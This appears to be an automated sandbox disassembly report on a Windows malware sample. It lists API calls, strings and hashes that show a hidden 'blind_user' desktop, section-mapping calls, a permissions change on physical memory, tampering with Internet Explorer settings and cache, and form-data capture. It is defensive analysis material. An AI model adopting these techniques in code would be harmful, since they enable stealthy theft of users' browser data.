                            • sprintf.CRTDLL(?,%s%u - Microsoft Internet Explorer,MicroSoft-Corp,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004053D4
                            • Sleep.KERNEL32(00007800,00000000,00000000,00000044,?), ref: 00405426
                            • Sleep.KERNEL32(0000F000,00007800,00000000,00000000,00000044,?), ref: 00405439
                            • GetWindowTextA.USER32(00000000,?,00000104), ref: 00405451
                            • DeleteFileA.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405499
                            • LocalFree.KERNEL32(?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004054A5
                            • TerminateProcess.KERNEL32(?,00000000,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004054B2
                            • CloseHandle.KERNEL32(?,?,00000000,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004054BD
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandleProcessSleepThreadstrcat$CreateCurrentDeleteDesktopFileFreeLocalTerminateTextWindowmemsetsprintf
                            • String ID: %s%u - Microsoft Internet Explorer$D$MicroSoft-Corp$X-okRecv11$\Iexplore.exe
                            • API String ID: 1202517094-2261298365
                            • Opcode ID: e98e409644201e6de021147ee2f0c1805f35588af9548cc9b8076052c01221a7
                            • Instruction ID: a5954b523feb805065d44168e487e19d6cbd8b1c6e851fe6a795fce517e83f05
                            • Opcode Fuzzy Hash: e98e409644201e6de021147ee2f0c1805f35588af9548cc9b8076052c01221a7
                            • Instruction Fuzzy Hash: 4F416572E442186ADB20AA65CC46BDDB3B99F50305F1444F7E208F61D1DABCAEC48F59
                            Function 00401B9F Relevance: 26.7, APIs: 11, Strings: 4, Instructions: 487memoryCOMMON
                            Download Yara Rule
                            APIs
                            • SysAllocString.OLEAUT32(value), ref: 00401BCC
                              • Part of subcall function 004017AC: CoInitialize.OLE32(00000000), ref: 004017CC
                              • Part of subcall function 004017AC: CLSIDFromString.OLE32({9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 004017DA
                              • Part of subcall function 004017AC: CoCreateInstance.OLE32(?,00000000,?,0042CD50,?,{9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 00401803
                            • _sleep.CRTDLL(00000000), ref: 00401BFD
                            • GetForegroundWindow.USER32(00000000), ref: 00401C02
                              • Part of subcall function 0040185F: GetWindowTextA.USER32(?,?,?), ref: 004018E2
                            • memcpy.CRTDLL(00418F40,?,?), ref: 00401D6D
                            • memcpy.CRTDLL(?,00418F40,?), ref: 00401F34
                            • _sleep.CRTDLL(00000000), ref: 00401F4A
                            • sprintf.CRTDLL(?,%s FORM_%X,?,?,00000000), ref: 00401F77
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: StringWindow_sleepmemcpy$AllocCreateForegroundFromInitializeInstanceTextsprintf
                            • String ID: %s %X%c$%s FORM_%X$%s%c$value
                            • API String ID: 3510745994-3693252589
                            • Opcode ID: 97066158e7caddc246d118ad30601bc5e86c518a965b60cc81196b9f5f35fe85
                            • Instruction ID: 207a0c2c24704257dc82047f11ad41d7b25eba1db427a6dda8aff0efe7f4a5ef
                            • Opcode Fuzzy Hash: 97066158e7caddc246d118ad30601bc5e86c518a965b60cc81196b9f5f35fe85
                            • Instruction Fuzzy Hash: 2112DC71A002199FDB62DB68CD44BDAB7F9BB0C304F5040FAA588E7290D7B4AAC58F55
                            Function 00402822 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 34libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleHandleA.KERNEL32(ntdll.dll,00000000,69D467A1,00402E1B,00000000,69D467A1,?,?,00406F1E,00000000,00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll), ref: 0040283A
                            • GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 00402847
                            • GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 00402857
                            • GetProcAddress.KERNEL32(00000000,NtOpenSection), ref: 0040286D
                            • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 0040287D
                            • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 0040288D
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$HandleModule
                            • String ID: NtMapViewOfSection$NtOpenSection$NtUnmapViewOfSection$RtlInitUnicodeString$RtlNtStatusToDosError$ntdll.dll
                            • API String ID: 667068680-1987783197
                            • Opcode ID: f3f948102971a568e61a5bb1a738835a59e2c1009918de6079867c1c535b5a8b
                            • Instruction ID: 9d3c92be313ac2760b75685e9acc68d9338f811418752029c31410863af0f615
                            • Opcode Fuzzy Hash: f3f948102971a568e61a5bb1a738835a59e2c1009918de6079867c1c535b5a8b
                            • Instruction Fuzzy Hash: BCF03A21B642206B93126B327D4293E36689792B19395003FF840F6191DB7C09225F9F
                            Function 00402E06 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 337libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00402822: GetModuleHandleA.KERNEL32(ntdll.dll,00000000,69D467A1,00402E1B,00000000,69D467A1,?,?,00406F1E,00000000,00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll), ref: 0040283A
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 00402847
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 00402857
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtOpenSection), ref: 0040286D
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 0040287D
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 0040288D
                            • GetVersion.KERNEL32 ref: 00402E22
                            • LoadLibraryA.KERNEL32 ref: 00402E91
                            • GetProcAddress.KERNEL32 ref: 00402EC5
                            • IsBadReadPtr.KERNEL32(?,00001000), ref: 00402F75
                            • GlobalMemoryStatus.KERNEL32(?), ref: 00402F9F
                            • CloseHandle.KERNEL32(?), ref: 00403065
                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004030EA
                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040315B
                            • IsBadWritePtr.KERNEL32(00000000,00001000), ref: 004031F1
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Handle$Module$CloseGlobalLibraryLoadMemoryQueryReadStatusVersionVirtualWrite
                            • String ID: kernel32.dll
                            • API String ID: 2089743848-1793498882
                            • Opcode ID: 4f42c9a603f3b22a608ddecb7cf3016b4a0286024c9d1ec82fce5a6e54f44313
                            • Instruction ID: cfd5926590b061e949c3a24607155209ead47d6dc4f6dfca132d0ef3b1a5cdf0
                            • Opcode Fuzzy Hash: 4f42c9a603f3b22a608ddecb7cf3016b4a0286024c9d1ec82fce5a6e54f44313
                            • Instruction Fuzzy Hash: F6F19070D042B88BEB328F64DD483E9BBB1AB55306F0481EBD588662D2C2B85FC5CF55
                            Function 004037AA Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 53COMMON
                            Download Yara Rule
                            APIs
                            • printf.CRTDLL([length=%i] [summ=%i],?,00000000), ref: 004037DD
                            • printf.CRTDLL(HEX: ,[length=%i] [summ=%i],?,00000000), ref: 004037EE
                            • printf.CRTDLL(%02X ,00000000), ref: 00403804
                            • printf.CRTDLL(TXT: '%s',?), ref: 0040382C
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: printf
                            • String ID: TXT: '%s'$%02X $HEX: $X4$[length=%i] [summ=%i]
                            • API String ID: 3524737521-4004101572
                            • Opcode ID: ca4ded32e23903f7249d6c5dbeb3a47121f77b3b45ed42eb0d7ff3160f68b428
                            • Instruction ID: a8ef6db4a05ad48ab0456940bf437e850f92713de92630681f76b68ebadef0f7
                            • Opcode Fuzzy Hash: ca4ded32e23903f7249d6c5dbeb3a47121f77b3b45ed42eb0d7ff3160f68b428
                            • Instruction Fuzzy Hash: 88016B62A04254BED7006FA7CC82A6F7FDCAB4175AF2080BEF545730C0D1B86F41D6A6
                            Function 004054D7 Relevance: 15.1, APIs: 10, Instructions: 109stringthreadmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 004054F1
                            • lstrlenA.KERNEL32(?,?), ref: 00405505
                            • lstrlenA.KERNEL32(?,?,?), ref: 00405513
                            • lstrlenA.KERNEL32(?,?,?,?), ref: 0040551F
                            • LocalAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 0040554B
                            • memcpy.CRTDLL(00000001,?,?,00000000,?,?,?,?,?), ref: 0040556A
                            • CreateThread.KERNEL32(00000000,00000000,Function_00005133,00000000,00000000,?), ref: 004055DE
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?,-00000005,?), ref: 004055EE
                            • GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?), ref: 004055F8
                            • CloseHandle.KERNEL32(00000000,00000000,?,00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006), ref: 004055FE
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Thread$AllocCloseCodeCreateExitHandleLocalObjectSingleWaitmemcpy
                            • String ID:
                            • API String ID: 2845097592-0
                            • Opcode ID: 7ec933356805a86d395f76af41b9b2d9f18e99f1d3eeeb5c371ae48cad7448a7
                            • Instruction ID: 017c82820a2f145177c9e28e2e3f5c0bebc6ad2cdfe5315ab2aa4ad5daf85086
                            • Opcode Fuzzy Hash: 7ec933356805a86d395f76af41b9b2d9f18e99f1d3eeeb5c371ae48cad7448a7
                            • Instruction Fuzzy Hash: 5E31D721A04159BACF01DFA6CC01AAEB7F9AF44318F144476F904E7291E63CDB15C7A9
                            Function 00405F5B Relevance: 13.6, APIs: 9, Instructions: 64stringthreadmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00405F73
                            • lstrlenA.KERNEL32(?,?), ref: 00405F7E
                            • LocalAlloc.KERNEL32(00000040,?,?,?), ref: 00405F8D
                            • lstrlenA.KERNEL32(?,00000000,?,00000040,?,?,?), ref: 00405FA2
                            • DeleteUrlCacheEntry.WININET(?), ref: 00405FB5
                            • CreateThread.KERNEL32(00000000,00000000,Function_00005C09,00000000,00000000,?), ref: 00405FCA
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040,?,?), ref: 00405FDD
                            • GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040), ref: 00405FE7
                            • CloseHandle.KERNEL32(00000000,00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?), ref: 00405FED
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Thread$AllocCacheCloseCodeCreateDeleteEntryExitHandleLocalObjectSingleWait
                            • String ID:
                            • API String ID: 794401840-0
                            • Opcode ID: 03fc3e79f5e594bfaf1f893bda151e66fa8c5b5e213fcd764589a016d7372ae4
                            • Instruction ID: 5ee1198a60b0fc2a8532ff5616a25e8349e08cf473eab22e95dc85017e90c3ca
                            • Opcode Fuzzy Hash: 03fc3e79f5e594bfaf1f893bda151e66fa8c5b5e213fcd764589a016d7372ae4
                            • Instruction Fuzzy Hash: B011CA71A082447BD701F6668C42EAFB76DDF85368F144476F600B71C2D678AF0147E9
                            Function 0040289A Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 99COMMON
                            Download Yara Rule
                            APIs
                            • GetSecurityInfo.ADVAPI32(?,00000006,?,00000000,00000000,?,00000000,?), ref: 00402976
                            • SetEntriesInAclA.ADVAPI32(00000001,00000002,?,?), ref: 00402988
                            • SetSecurityInfo.ADVAPI32(?,00000006,?,00000000,00000000,?,00000000,?,00000006,?,00000000,00000000,?,00000000,?), ref: 004029A3
                            • CloseHandle.KERNEL32(?,?,00000006,?,00000000,00000000,?,00000000,?,00000006,?,00000000,00000000,?,00000000,?), ref: 004029B1
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: InfoSecurity$CloseEntriesHandle
                            • String ID: @$CURRENT_USER$\device\physicalmemory
                            • API String ID: 405656561-3357994103
                            • Opcode ID: 3f106b48de9bb5ba9ca254209248b2c107f34978da584956db3145db2ea5644b
                            • Instruction ID: 89d45d45e0a184fa7970b295066ffccd564a705ae1855cc5323f3f658fcd5c06
                            • Opcode Fuzzy Hash: 3f106b48de9bb5ba9ca254209248b2c107f34978da584956db3145db2ea5644b
                            • Instruction Fuzzy Hash: 2A41EB71E4030DAFEB108FD4DC85BEEB7B9FB04319F50403AEA00BA191D7B9595A8B59
                            Function 0040509B Relevance: 12.0, APIs: 1, Strings: 7, Instructions: 43COMMON
                            Download Yara Rule
                            APIs
                            • sprintf.CRTDLL(?,SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u,00000000), ref: 004050CD
                            Strings
                            • SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u, xrefs: 004050C1
                            • Software\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 004050FF
                            • yes, xrefs: 0040510E
                            • 1601, xrefs: 004050D4
                            • BrowseNewProcess, xrefs: 00405113
                            • .DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess, xrefs: 00405118
                            • GlobalUserOffline, xrefs: 004050FA
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: sprintf
                            • String ID: .DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess$1601$BrowseNewProcess$GlobalUserOffline$SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u$Software\Microsoft\Windows\CurrentVersion\Internet Settings$yes
                            • API String ID: 590974362-546450379
                            • Opcode ID: ad57bd7a5e5ee7174c091d0a3ea72984deb32bb5560bbbda773b8a609c7be674
                            • Instruction ID: cd0aaffbc0bd71aa605591c0976343fec0ffbebd6d6d4fedce8ce2f9217411d7
                            • Opcode Fuzzy Hash: ad57bd7a5e5ee7174c091d0a3ea72984deb32bb5560bbbda773b8a609c7be674
                            • Instruction Fuzzy Hash: 24F07DF2F883587EE710A1699C47F8D765907A1704FA400A7BA44B10C2D0FE56C6826D
                            Function 004077E4 Relevance: 10.6, APIs: 7, Instructions: 83windowCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: Focus$CallProcWindow
                            • String ID:
                            • API String ID: 2401821148-0
                            • Opcode ID: 92e1ce8f7ee7a46a278bda77c005b4e0a5389e500612bd3ca87d360d572643d3
                            • Instruction ID: 67d25c2989ca0d32993d4aa71a0b11dc39683739a3ff9c0c7d6bcfde353c753a
                            • Opcode Fuzzy Hash: 92e1ce8f7ee7a46a278bda77c005b4e0a5389e500612bd3ca87d360d572643d3
                            • Instruction Fuzzy Hash: 6F318233E082149BDF21FB29ED848DA7726A751324715C43AE550B32B1DB787C91CB6E
                            Function 004036B3 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 004036D7
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 004036F4
                            • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403715
                            • WriteFile.KERNEL32(00000000,0042CC6C,00000002,?,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000), ref: 00403728
                            • CloseHandle.KERNEL32(00000000,00000000,0042CC6C,00000002,?,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?), ref: 00403734
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Write$CloseCreateHandlePointer
                            • String ID: Y&-v
                            • API String ID: 2529654636-852306816
                            • Opcode ID: 1a2ee31b6e64b1819939f0b424d9492dfa5bc2d8a36479f3b8c11624ee1f3d36
                            • Instruction ID: 393fb1fac6dfb6d7043d4134058e676a256c67ba5a84656a07003a75d011006f
                            • Opcode Fuzzy Hash: 1a2ee31b6e64b1819939f0b424d9492dfa5bc2d8a36479f3b8c11624ee1f3d36
                            • Instruction Fuzzy Hash: A401A772B4461439F62165758C43F9E365D8B41B78F208136F711BB1C1D6F97E0142BD
                            Function 00405613 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78COMMON
                            Download Yara Rule
                            APIs
                            • FindFirstUrlCacheEntryA.WININET(*.*,?,00001F40), ref: 00405654
                            • _stricmp.CRTDLL(?,?), ref: 00405679
                            • FindNextUrlCacheEntryA.WININET(00000000,?,00001F40), ref: 004056C0
                            • _stricmp.CRTDLL(?,?), ref: 004056D6
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: CacheEntryFind_stricmp$FirstNext
                            • String ID: *.*
                            • API String ID: 747601842-438819550
                            • Opcode ID: ba5afd5151c0520d6d715a10c5df759dc41a82144f0bc2f8a3a4ef8e8a54dfaf
                            • Instruction ID: aa6d97de36eacb02400b0bc5d5be45fc0d4f636131057f9c0ab70f2a458f06eb
                            • Opcode Fuzzy Hash: ba5afd5151c0520d6d715a10c5df759dc41a82144f0bc2f8a3a4ef8e8a54dfaf
                            • Instruction Fuzzy Hash: AD21CF72E1005AABCB109A65CC018FBB6EEEB44398F1404F3F108F7290EB799E418F65
                            Function 0040431F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50threadCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentThreadId.KERNEL32 ref: 00404341
                            • GetThreadDesktop.USER32(00000000), ref: 00404347
                            • CreateDesktopA.USER32(blind_user,00000000,00000000,00000000,000000C7,00000000), ref: 00404376
                            • SetThreadDesktop.USER32 ref: 00404394
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
